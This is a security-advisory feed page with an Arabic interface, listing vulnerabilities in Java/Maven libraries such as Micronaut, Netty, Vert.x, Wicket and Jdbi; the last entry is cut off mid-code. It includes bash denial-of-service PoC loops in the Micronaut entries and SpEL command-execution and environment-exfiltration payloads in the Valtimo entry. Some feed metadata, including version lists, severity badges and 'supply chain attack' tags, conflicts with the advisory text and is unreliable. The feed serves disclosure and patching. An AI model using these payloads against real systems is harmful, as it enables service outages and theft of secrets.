💬 ### Impact Applications using Spring Cloud AWS SNS HTTP/HTTPS endpoint support (@NotificationMessageMapping, @NotificationSubscriptionMapping, @NotificationUnsubscribeConfirmationMapping) did not verify the signature of incoming SNS messages. An unauthenticated attacker who...
📅 2026-05-07 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Impact Applications using Spring Cloud AWS SNS HTTP/HTTPS endpoint support (@NotificationMessageMapping, @NotificationSubscriptionMapping, @NotificationUnsubscribeConfirmationMapping) did not verify the signature of incoming SNS messages. An unauthenticated attacker who knows the endpoint URL could send crafted HTTP POST requests mimicking SNS Notification or SubscriptionConfirmation messages, causing the application to: - Process arbitrary payloads as if they were legitimate SNS notifications. - Auto-confirm subscriptions or unsubscribe from attacker-controlled topics. Affected versions: 3.0.0 through 3.4.2, 4.0.0, and 4.0.1. The 3.x line will not receive a fix; users on 3.x should apply the workaround below or upgrade to 4.0.2. ### Patches Fixed in Spring Cloud AWS 4.0.2. When using Spring Boot auto-configuration, signature verification is enabled by default. Users should upgrade to 4.0.2. ### Workarounds Manually verify the SNS message signature in a servlet filter or Spring HandlerInterceptor before the request reaches the controller, using SnsMessageManager from the AWS SDK v2 sns-message-manager module. ### Resources - AWS SNS: Verifying the signatures of Amazon SNS messages (https://docs.aws.amazon.com/sns/latest/dg/sns-verify-signature-of-message.html) - AWS SDK for Java v2: SnsMessageManager (https://sdk.amazonaws.com/java/api/latest/software/amazon/awssdk/messagemanager/sns/SnsMessageManager.html) - Fix PR: #1614

الإصدارات المتأثرة

4.0.0, 4.0.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

غير محدد
📦 com.getaxonflow:axonflow-sdk 📌 1.0.0, 1.1.0, 1.1.1, 1.1.2, 1.10.0 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary The AxonFlow SDK's `WebhookSubscription` (or equivalent) type did not expose the HMAC-SHA256 signing key returned by the platform's `CreateWebhook` endpoint. Without access to the secret through the typed SDK API, callers had no path to verify the `X-AxonFlow-Signatur...
📅 2026-05-06 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Summary The AxonFlow SDK's `WebhookSubscription` (or equivalent) type did not expose the HMAC-SHA256 signing key returned by the platform's `CreateWebhook` endpoint. Without access to the secret through the typed SDK API, callers had no path to verify the `X-AxonFlow-Signature` header on incoming webhook deliveries. Affected callers had two unsatisfactory options: 1. Skip signature verification entirely — accepting any payload from any source that knew the webhook URL. 2. Hand-parse the raw HTTP JSON response to extract the secret, bypassing the type-safe SDK surface. This advisory is filed across all four AxonFlow SDKs (Go, Python, TypeScript, Java) because the same defect and the same fix landed in each. ## Affected versions Versions prior to 6.0.0. ## Impact A webhook receiver using the SDK's typed API to handle inbound deliveries had no path to authenticate the source of incoming payloads. An attacker who learned the webhook URL — through misconfiguration, log leakage, observable network traffic during setup, or any other discovery channel — could forge webhook deliveries indistinguishable from legitimate ones, causing the receiving application to act on fabricated events (e.g. simulated approval-granted callbacks, simulated policy-decision callbacks, simulated step-completion callbacks). ## Remediation Upgrade to the patched version listed in Vulnerabilities below. The signing key is now exposed on the `WebhookSubscription` response type returned by `CreateWebhook`. Implementations should: 1. Persist the secret returned by `CreateWebhook` securely (it is only returned once, at create time). 2. On each incoming webhook delivery, compute `HMAC-SHA256(secret, raw_body)` and compare it in constant time against the `X-AxonFlow-Signature` header. 3. Reject any delivery whose signature does not match. ## Credit Identified by AxonFlow internal security review during the April 2026 quality-freeze epic.

الإصدارات المتأثرة

1.0.0, 1.1.0, 1.1.1, 1.1.2, 1.10.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

عالية
📦 io.netty:netty-transport-native-epoll 📌 4.0.16.Final, 4.0.17.Final, 4.0.18.Final, 4.0.19.Final, 4.0.20.Final ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread. ## Affected versions All version...
📅 2026-05-06 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Summary Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread. ## Affected versions All versions of 4.2.x `netty-transport-native-epoll` up to and including 4.2.12.Final ## Fixed in 4.2.13.Final (fix merged into the `4.2` branch via [#16689](https://github.com/netty/netty/pull/16689); release not yet cut as of 2026-04-25). ## Severity **Medium** — Denial of Service (resource exhaustion / CPU spin) **CWE:** CWE-772: Missing Release of Resource after Effective Lifetime ## Description When a TCP connection using Netty's epoll transport has `ALLOW_HALF_CLOSURE` enabled (or is in a half-closed state via the HTTP codec), and the remote peer: 1. Sends a FIN (half-close), causing the server to mark the input as shutdown, then 2. Sends a RST (e.g. by closing with `SO_LINGER=0`) the server-side channel is never closed. This happens because: - `epollOutReady()` is a no-op when there is no pending flush. - `epollInReady()` short-circuits via `shouldBreakEpollInReady()` because input is already marked as shutdown. - The `EPOLLERR`/`EPOLLHUP` error condition is therefore never processed, and `channelInactive` is never fired. Depending on the Netty version and configuration, this results in: - **Stale channels**: The connection is never closed or deregistered. An unauthenticated remote attacker can repeat the sequence to accumulate stale connections, exhausting file descriptors, memory, or connection-count limits. - **CPU busy-loop**: In code paths where `clearEpollIn0()` is not called during the `ChannelInputShutdownReadComplete` event, `epoll_wait` returns immediately on every iteration for the affected fd, causing 100% CPU utilization on the event loop thread and starving all other connections multiplexed on it. ## Mitigation - Upgrade to 4.2.13.Final when released (or build from the `4.2` branch at commit [`0ec3d97`](https://github.com/netty/netty/commit/0ec3d97fab376e243d328ac95fbd288ba0f6e22d)). - If upgrading is not immediately possible, configure idle timeouts on connections to limit the lifetime of stale channels. ## Resources - Issue: https://github.com/netty/netty/issues/16683 - Fix: https://github.com/netty/netty/pull/16689

الإصدارات المتأثرة

4.0.16.Final, 4.0.17.Final, 4.0.18.Final, 4.0.19.Final, 4.0.20.Final

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

حرجة
📦 com.ritense.valtimo:document 📌 12.0.0.RELEASE, 12.0.1.RELEASE, 12.1.0.RELEASE, 12.1.1.RELEASE, 12.1.2.RELEASE ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary Multiple classes evaluate Spring Expression Language (SpEL) expressions from user-supplied input using `StandardEvaluationContext`, which provides unrestricted access to Java types and methods. An authenticated user with the ADMIN role can achieve Remote Code Executi...
📅 2026-05-06 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Summary Multiple classes evaluate Spring Expression Language (SpEL) expressions from user-supplied input using `StandardEvaluationContext`, which provides unrestricted access to Java types and methods. An authenticated user with the ADMIN role can achieve Remote Code Execution and credential exfiltration. ### Impact An attacker with ADMIN credentials can: - **Execute arbitrary OS commands** via `T(java.lang.Runtime).getRuntime().exec('...')` - **Exfiltrate all environment variables** (database passwords, API keys, Keycloak secrets) via `T(java.lang.System).getenv()` - **Read JVM system properties** via `T(java.lang.System).getProperties()` - **Load arbitrary classes** via `T(java.lang.Class).forName('...')` ### Affected Components **1. DocumentMigrationService** (since 12.0.0) Exploitable through the document migration REST API: - `POST /api/management/v1/document-definition/migrate` - `POST /api/management/v1/document-definition/migration/conflicts` The malicious SpEL expression is supplied in the `source` or `target` field of a `DocumentMigrationPatch` object in the request body, using the `${...}` template syntax. - In 12.x: `com.ritense.document.service.DocumentMigrationService#handleSpelExpression` (document module) - In 13.x: same class, moved to the case module **2. Condition** (since 13.4.0) Exploitable through any admin-configured widget, dashboard, or feature that uses the `Condition` framework. The SpEL expression is supplied in the `value` field of a condition's JSON configuration. - `com.ritense.valtimo.contract.conditions.Condition#resolveValue` (contract module) This component has a significantly wider attack surface than DocumentMigrationService, as conditions are used across many modules. ### Remediation Replace `StandardEvaluationContext` with `SimpleEvaluationContext` in both affected classes, which disallows Java type references and arbitrary method invocation: ```kotlin val evaluationContext = SimpleEvaluationContext .forPropertyAccessors(MapAccessor(), jsonPropertyAccessor) .build() ```

الإصدارات المتأثرة

12.0.0.RELEASE, 12.0.1.RELEASE, 12.1.0.RELEASE, 12.1.1.RELEASE, 12.1.2.RELEASE

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

عالية
📦 io.micronaut:micronaut-context 📌 4.10.0, 4.10.1, 4.10.10, 4.10.11, 4.10.12 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary `TimeConverterRegistrar` caches `DateTimeFormatter` instances in an unbounded `ConcurrentHashMap<String, DateTimeFormatter>` whose key is derived from the `@Format` annotation pattern concatenated with the locale from the HTTP `Accept-Language` header. Because `Locale...
📅 2026-05-06 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Summary `TimeConverterRegistrar` caches `DateTimeFormatter` instances in an unbounded `ConcurrentHashMap<String, DateTimeFormatter>` whose key is derived from the `@Format` annotation pattern concatenated with the locale from the HTTP `Accept-Language` header. Because `Locale.forLanguageTag()` accepts arbitrary BCP 47 private-use extensions (`en-x-a001`, `en-x-a002`, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This is structurally identical to the recently patched GHSA-2hcp-gjrf-7fhc (`DefaultHtmlErrorResponseBodyProvider`), but `TimeConverterRegistrar.formattersCache` was not covered by that fix. ## Details The vulnerable cache is declared in `context/src/main/java/io/micronaut/runtime/converters/time/TimeConverterRegistrar.java` at line 123: ```java // TimeConverterRegistrar.java:123 private final Map<String, DateTimeFormatter> formattersCache = new ConcurrentHashMap<>(); ``` The `getFormatter` method at line 434 inserts into this map with no eviction or size limit: ```java // TimeConverterRegistrar.java:434-443 private DateTimeFormatter getFormatter(String pattern, ConversionContext context) { var key = pattern + context.getLocale(); // locale from Accept-Language header var cachedFormatter = formattersCache.get(key); if (cachedFormatter != null) { return cachedFormatter; } var formatter = DateTimeFormatter.ofPattern(pattern, context.getLocale()); formattersCache.put(key, formatter); // NO SIZE CHECK — unbounded growth return formatter; } ``` The attacker-controlled locale flows into the cache key through this call chain: 1. **HTTP header parsed** — `HttpHeaders.findAcceptLanguage()` at `http/src/main/java/io/micronaut/http/HttpHeaders.java:766-771` calls `Locale.forLanguageTag(part)` directly on the raw `Accept-Language` value: ```java // HttpHeaders.java:766-771 default Optional<Locale> findAcceptLanguage() { return findFirst(HttpHeaders.ACCEPT_LANGUAGE) .map(text -> { String part = HttpHeadersUtil.splitAcceptHeader(text); return part == null ? Locale.getDefault() : Locale.forLanguageTag(part); }); } ``` 2. **Locale planted in ConversionContext** — `AbstractRouteMatch.newContext()` at `router/src/main/java/io/micronaut/web/router/AbstractRouteMatch.java:373-378` passes the request locale into the conversion context for every route argument binding: ```java // AbstractRouteMatch.java:373-378 private <E> ArgumentConversionContext<E> newContext(Argument<E> argument, HttpRequest<?> request) { return ConversionContext.of( argument, request.getLocale().orElse(null), // ← attacker-controlled via Accept-Language request.getCharacterEncoding() ); } ``` 3. **Unbounded cache insert** — When any temporal argument annotated with `@Format` is bound, `TimeConverterRegistrar.getFormatter(pattern, context)` is called and inserts a new `DateTimeFormatter` for each unique `pattern + locale` key. This path is triggered for any route endpoint with a `@Format`-annotated temporal parameter. This is an officially documented and commonly used Micronaut pattern, demonstrated in the framework's own test suite: ```java // test-suite/.../BindingController.java:105 (official Micronaut example) @Get("/dateFormat") public String dateFormat(@Format("dd/MM/yyyy hh:mm:ss a z") @Header ZonedDateTime date) { return date.toString(); } ``` `TimeConverterRegistrar` is an `@Internal` core bean registered unconditionally in every Micronaut application — it is not optional or user-configured. By contrast, the `DefaultHtmlErrorResponseBodyProvider` cache patched in GHSA-2hcp-gjrf-7fhc now uses a `ConcurrentLinkedHashMap` bounded at 100 entries; `TimeConverterRegistrar.formattersCache` remains an unbounded plain `ConcurrentHashMap`. ## PoC Against any Micronaut application exposing an endpoint with a `@Format`-annotated temporal parameter: ```bash # Flood the formattersCache with unique locale-derived keys for i in $(seq 1 200000); do curl -s -o /dev/null \ -H "Accept-Language: en-x-$(printf '%06d' $i)" \ -H "date: 01/01/2024 12:00:00 AM UTC" \ "http://localhost:8080/dateFormat" & # Throttle to avoid socket exhaustion [ $((i % 500)) -eq 0 ] && wait done wait # Server will throw OutOfMemoryError after enough unique locale entries accumulate ``` Each request with a novel `en-x-XXXXXX` private-use tag inserts a new `DateTimeFormatter` entry into the unbounded map. Each `DateTimeFormatter` (with locale metadata) occupies roughly 2–10 KB on the heap. At 100,000 unique entries, the map alone can consume ~500 MB; at 500,000 entries the JVM typically crashes with `OutOfMemoryError: Java heap space`. ## Impact - An unauthenticated attacker can crash any Micronaut server that exposes at least one endpoint with a `@Format`-annotated temporal type parameter — a documented, first-class framework feature. - Memory grows linearly with the number of unique `Accept-Language` values sent. The BCP 47 private-use namespace (`en-x-ANYTHING`) provides millions of distinct valid locale strings. - No credentials, special permissions, or exploitation of application logic are required — only the ability to send HTTP requests with custom headers. - `TimeConverterRegistrar` is active in all Micronaut HTTP server applications by default; no special configuration is needed to be vulnerable. ## Recommended Fix Apply the same fix pattern used for GHSA-2hcp-gjrf-7fhc: replace the unbounded `ConcurrentHashMap` with a bounded `ConcurrentLinkedHashMap`: ```java // In TimeConverterRegistrar.java — replace line 123 import io.micronaut.core.util.clhm.ConcurrentLinkedHashMap; private static final int MAX_FORMATTERS_CACHE_SIZE = 100; private final Map<String, DateTimeFormatter> formattersCache = new ConcurrentLinkedHashMap.Builder<String, DateTimeFormatter>() .maximumWeightedCapacity(MAX_FORMATTERS_CACHE_SIZE) .build(); ``` Alternatively, since `@Format` pattern values come from static annotations (a bounded, compile-time set), the locale should be excluded from the cache key and applied at use-time instead: ```java // In getFormatter() — cache only by pattern, apply locale at use-time private DateTimeFormatter getFormatter(String pattern, ConversionContext context) { DateTimeFormatter base = formattersCache.computeIfAbsent( pattern, p -> DateTimeFormatter.ofPattern(p) ); Locale locale = context.getLocale(); return locale != null ? base.withLocale(locale) : base; } ``` This second approach bounds the cache by the number of distinct `@Format` patterns in the application, which is always small and finite, fully eliminating the attack surface.

الإصدارات المتأثرة

4.10.0, 4.10.1, 4.10.10, 4.10.11, 4.10.12

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

منخفضة
📦 io.micronaut:micronaut-inject 📌 1.0.0, 1.0.0.RC3, 1.0.1, 1.0.2, 1.0.3 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary `ResourceBundleMessageSource` maintains two caches: `messageCache` (bounded at 100 entries via `ConcurrentLinkedHashMap`) and `bundleCache` (unbounded `ConcurrentHashMap`). The `bundleCache` is keyed by `(Locale, baseName)` where the locale originates from the HTTP `A...
📅 2026-05-06 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Summary `ResourceBundleMessageSource` maintains two caches: `messageCache` (bounded at 100 entries via `ConcurrentLinkedHashMap`) and `bundleCache` (unbounded `ConcurrentHashMap`). The `bundleCache` is keyed by `(Locale, baseName)` where the locale originates from the HTTP `Accept-Language` header. In applications that explicitly register a `ResourceBundleMessageSource` bean and serve HTML error responses, an unauthenticated attacker can exhaust heap memory by sending requests with large numbers of unique `Accept-Language` values, each causing a new entry in the unbounded `bundleCache`. Unlike GHSA-2hcp-gjrf-7fhc and the sibling `messageCache` (both bounded), `bundleCache` was not updated to use a bounded cache implementation. ## Details The `bundleCache` is initialized in `inject/src/main/java/io/micronaut/context/i18n/ResourceBundleMessageSource.java` at line 150: ```java // ResourceBundleMessageSource.java:139-152 protected Map<MessageKey, Optional<String>> buildMessageCache() { return new ConcurrentLinkedHashMap.Builder<MessageKey, Optional<String>>() .maximumWeightedCapacity(100) // ← BOUNDED ✓ .build(); } protected Map<MessageKey, Optional<ResourceBundle>> buildBundleCache() { return new ConcurrentHashMap<>(18); // ← UNBOUNDED ✗ } ``` The `resolveBundle()` method at line 169 inserts into `bundleCache` with no eviction policy: ```java // ResourceBundleMessageSource.java:169-185 private Optional<ResourceBundle> resolveBundle(Locale locale) { MessageKey key = new MessageKey(locale, baseName); final Optional<ResourceBundle> resourceBundle = bundleCache.get(key); if (resourceBundle != null) { return resourceBundle; } else { Optional<ResourceBundle> opt; try { opt = Optional.of(ResourceBundle.getBundle(baseName, locale, getClassLoader())); } catch (MissingResourceException e) { opt = Optional.empty(); } bundleCache.put(key, opt); // NO SIZE CHECK — unbounded growth return opt; } } ``` The attack path requires: 1. The application registers a `ResourceBundleMessageSource` bean (non-default, requires explicit user configuration). 2. The attacker sends requests that trigger HTML error responses — i.e., requests with `Accept: text/html` to any URL that returns an error (e.g., 404 for any non-existent path). 3. Each request uses a unique `Accept-Language` value (e.g., `zz-AA`, `zz-AB`, …). 4. `DefaultHtmlErrorResponseBodyProvider.error()` calls `messageSource.getMessage(code, locale)` → `CompositeMessageSource` delegates to `ResourceBundleMessageSource` → `resolveBundle(locale)` inserts one entry per unique locale into `bundleCache`. For locales that don't match any bundle file, `ResourceBundle.getBundle()` throws `MissingResourceException` and `Optional.empty()` is stored — a low-cost sentinel. For locales that DO match a bundle, a full `ResourceBundle` object is retained in memory. In either case, the map itself and the `MessageKey` objects grow without bound. Note: the `messageCache` is bounded at 100 entries but does not prevent `bundleCache` growth, as `resolveBundle()` is called directly (bypassing `messageCache`) whenever a `messageCache` miss occurs. ## PoC Against a Micronaut application with a `ResourceBundleMessageSource` bean registered (e.g., `@Bean ResourceBundleMessageSource messages() { return new ResourceBundleMessageSource("messages"); }`): ```bash # Flood bundleCache with unique locales via HTML error path for i in $(seq 1 100000); do curl -s -o /dev/null \ -H "Accept: text/html" \ -H "Accept-Language: zz-$(printf '%04d' $i)" \ "http://localhost:8080/nonexistent-path-$(printf '%06d' $i)" & [ $((i % 200)) -eq 0 ] && wait done wait ``` Each unique `zz-XXXX` tag creates one new `bundleCache` entry. The `MessageKey` (Locale + baseName) and map overhead cost approximately 100-200 bytes per entry. At 100,000 entries, heap consumption from the cache alone reaches roughly 20 MB — significant in resource-constrained deployments. If a locale matches a bundle file, retained `ResourceBundle` objects cost substantially more per entry. ## Impact - Only affects applications that explicitly register a `ResourceBundleMessageSource` bean (not the default configuration). - Requires the ability to send HTTP requests with `Accept: text/html` headers and control over the `Accept-Language` value. - Memory grows approximately 100-200 bytes per novel locale (for non-matching locales) up to several KB per locale if bundles are found. Sustained attack over time causes gradual heap exhaustion. - Partial availability impact (A:L) under sustained attack in long-running services. ## Recommended Fix Apply the same bounded-cache pattern used for the sibling `messageCache`: ```java // In ResourceBundleMessageSource.java — replace buildBundleCache() protected Map<MessageKey, Optional<ResourceBundle>> buildBundleCache() { return new ConcurrentLinkedHashMap.Builder<MessageKey, Optional<ResourceBundle>>() .maximumWeightedCapacity(50) // small — one entry per (locale, baseName) .build(); } ``` The number of distinct resource bundle files is bounded at compile time; a limit of 50 entries is more than sufficient for any realistic i18n configuration while fully preventing unbounded growth.

الإصدارات المتأثرة

1.0.0, 1.0.0.RC3, 1.0.1, 1.0.2, 1.0.3

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

6.9/10 متوسطة
📦 io.vertx:vertx-core 📌 4.3.4, 4.3.5, 4.3.6, 4.3.7, 4.3.8 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ Certificate Validation 🎯 عن بعد ⚪ لم تُستغل
💬 Potential unbounded server-side SNI `SslContext` cache growth in Vert.x TLS handling, with possible resource-exhaustion / DoS impact. On affected versions, matching server-side SNI names are cached via `computeIfAbsent(serverName, ...)` in a serverName-keyed `SslContext` cache, ...
📅 2026-05-06 NVD 🔗 التفاصيل

الوصف الكامل

Potential unbounded server-side SNI `SslContext` cache growth in Vert.x TLS handling, with possible resource-exhaustion / DoS impact. On affected versions, matching server-side SNI names are cached via `computeIfAbsent(serverName, ...)` in a serverName-keyed `SslContext` cache, and I could not find any bound, TTL, or eviction for that cache. The implementation differs slightly by branch, but the same sink appears to be present in released versions `4.3.4` through `5.0.8`: - `4.3.x`: `SSLHelper` - `4.4.x` / `4.5.x`: `SslChannelProvider` - `5.0.x` and current `master`: `SslContextProvider` It appears that when server-side SNI is enabled, and wildcard or otherwise broad hostname mappings are used, an unauthenticated client can send many distinct matching SNI names and cause the server to retain increasing numbers of `SslContext` entries over time, leading to increasing memory consumption and possible DoS conditions. A check was performed on the related TCP SNI path across affected versions, the QUIC SNI path on `5.x`, and the wildcard hostname resolution helpers used during certificate selection. ## Steps to reproduce 1. Configure a Vert.x server with `setSsl(true)` and `setSni(true)`. 2. Use a keystore or mapping where many distinct SNI names match a wildcard or similarly broad rule. 3. Send repeated connections with distinct matching SNI values. 4. Observe that the SNI cache size grows with the number of unique matching names. Local observations: - initial `sniEntrySize()` = `0` - after 20 unique matching names: `20` - after 40 unique matching names: `40` - repeating previously seen matching names did not grow the cache further - non-matching SNI names did not create new cache entries ## What are the affected versions? Affected released versions confirmed on `origin`: - `4.3.4` through `4.3.8` - `4.4.0` through `4.4.9` - `4.5.0` through `4.5.25` - `5.0.0` through `5.0.8` Not affected by the same sink: - `4.0.x` through `4.2.x` - `4.3.0` through `4.3.3` ## Are there any ways to mitigate this issue? - Disable server-side SNI if it is not needed. - Avoid wildcard or otherwise high-cardinality hostname mappings where feasible. - Apply connection or rate limiting in front of the service.

الإصدارات المتأثرة

4.3.4, 4.3.5, 4.3.6, 4.3.7, 4.3.8

نوع الثغرة

CWE-295 — Certificate Validation

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

6.5/10 متوسطة
📦 wicket 🏢 apache 📌 8.0.0 - 8.17.0 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ Path Traversal 🎯 عن بعد ⚪ لم تُستغل
💬 FolderUploadsFileManager in Apache Wicket does not validate or sanitize the uploadFieldId parameter or the clientFileName before constructing file paths, allowing an unauthenticated attacker to write arbitrary files outside the intended upload directory or read files from arbi...
📅 2026-05-06 NVD 🔗 التفاصيل

الوصف الكامل

FolderUploadsFileManager in Apache Wicket does not validate or sanitize the uploadFieldId parameter or the clientFileName before constructing file paths, allowing an unauthenticated attacker to write arbitrary files outside the intended upload directory or read files from arbitrary locations on the server. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue.

الإصدارات المتأثرة

8.0.0 - 8.17.0

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

7.5/10 عالية
📦 wicket 🏢 apache 📌 8.0.0 - 8.17.0 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ Info Disclosure 🎯 عن بعد ⚪ لم تُستغل
💬 Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the iss...
📅 2026-05-06 NVD 🔗 التفاصيل

الوصف الكامل

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue.

الإصدارات المتأثرة

8.0.0 - 8.17.0

نوع الثغرة

CWE-200 — Info Disclosure

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

6.1/10 متوسطة
📦 wicket 🏢 apache 📌 8.0.0 - 8.17.0 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ XSS 🎯 عن بعد ⚪ لم تُستغل
💬 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes t...
📅 2026-05-06 NVD 🔗 التفاصيل

الوصف الكامل

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue.

الإصدارات المتأثرة

8.0.0 - 8.17.0

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

9.1/10 حرجة
📦 wicket 🏢 apache 📌 8.0.0 - 8.17.0 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ Session Fixation 🎯 عن بعد ⚪ لم تُستغل
💬 Missing invocation of Servlet http web request method changeSessionId after session binding can be exploited for a session fixation attack in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to ...
📅 2026-05-06 NVD 🔗 التفاصيل

الوصف الكامل

Missing invocation of Servlet http web request method changeSessionId after session binding can be exploited for a session fixation attack in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue.

الإصدارات المتأثرة

8.0.0 - 8.17.0

نوع الثغرة

CWE-384 — Session Fixation

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

حرجة
📦 com.arcadedb:arcadedb-server 📌 21.10.1, 21.10.2, 21.11.1, 21.12.1, 21.9.1 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact Authenticated users and API tokens scoped to a specific database could read, write, and mutate schema on any other database on the same server. Two distinct defects contributed: (1) ServerSecurityUser.getDatabaseUser() returned a DB user with an uninitialized fileAcces...
📅 2026-05-05 OSV/Maven 🔗 التفاصيل

الوصف الكامل

### Impact Authenticated users and API tokens scoped to a specific database could read, write, and mutate schema on any other database on the same server. Two distinct defects contributed: (1) ServerSecurityUser.getDatabaseUser() returned a DB user with an uninitialized fileAccessMap, which requestAccessOnFile treated as allow-all; (2) ArcadeDBServer.createDatabase() omitted factory.setSecurity(...) so any database created via POST /api/v1/server {"command":"create database X"} had its entire record-level authorization system silently disabled. In combination, record-level and database-level authorization could be bypassed by any authenticated principal. ### Patches Upgrade to version 26.4.2 ### Resources https://github.com/ArcadeData/arcadedb/commit/04110c06315da55604ac107f71fe7182f3a3deb8

الإصدارات المتأثرة

21.10.1, 21.10.2, 21.11.1, 21.12.1, 21.9.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

عالية
📦 org.jdbi:jdbi3-freemarker 📌 3.10.0, 3.10.0-rc1, 3.10.1, 3.11.0, 3.11.1 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 # Summary **Description** An Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336) vulnerability in Jdbi allows arbitrary command execution when an application using `jdbi3-freemarker` permits attacker-influenced text to reach `FreemarkerEngine.parse(...
📅 2026-05-05 OSV/Maven 🔗 التفاصيل

الوصف الكامل

# Summary **Description** An Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336) vulnerability in Jdbi allows arbitrary command execution when an application using `jdbi3-freemarker` permits attacker-influenced text to reach `FreemarkerEngine.parse()` as template source. This affects `org.jdbi:jdbi3-freemarker` through version 3.52.1. The developer opts into FreeMarker-backed SQL templating, but does not explicitly opt into reflective Java class loading from template source. Jdbi’s FreeMarker integration should not expose unrestricted Java class instantiation by default in a SQL templating module. While the SQL injection risk is acknowledged, Jdbi’s documentation explicitly supports and demonstrates dynamic SQL templating through defined attributes, including substitution of non-bindable SQL elements such `ORDER BY` columns. ## Details Jdbi constructs the underlying `freemarker.template.Configuration` with `DEFAULT_INCOMPATIBLE_IMPROVEMENTS` and never installs a `TemplateClassResolver`, so Freemarker's legacy `UNRESTRICTED_RESOLVER` remains active and the `?new` built-in can instantiate arbitrary classes, including `freemarker.template.utility.Execute`. Two `Configuration` instances are constructed in the module, neither of which is hardened: ```java // freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerConfig.java public FreemarkerConfig() { freemarkerConfiguration = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS); freemarkerConfiguration.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/")); freemarkerConfiguration.setNumberFormat("computer"); } ``` ```java // freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerSqlLocator.java static { Configuration c = new 